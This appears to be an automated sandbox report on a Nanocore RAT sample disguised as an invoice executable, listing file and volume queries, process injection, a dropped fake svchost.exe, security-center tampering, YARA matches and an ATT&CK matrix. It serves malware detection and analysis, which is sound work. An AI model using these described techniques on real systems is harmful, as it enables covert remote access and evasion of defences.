        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,8_2_0040A272
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 00000019.00000003.457248749.0000000006134000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential DumpingFile and Directory Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
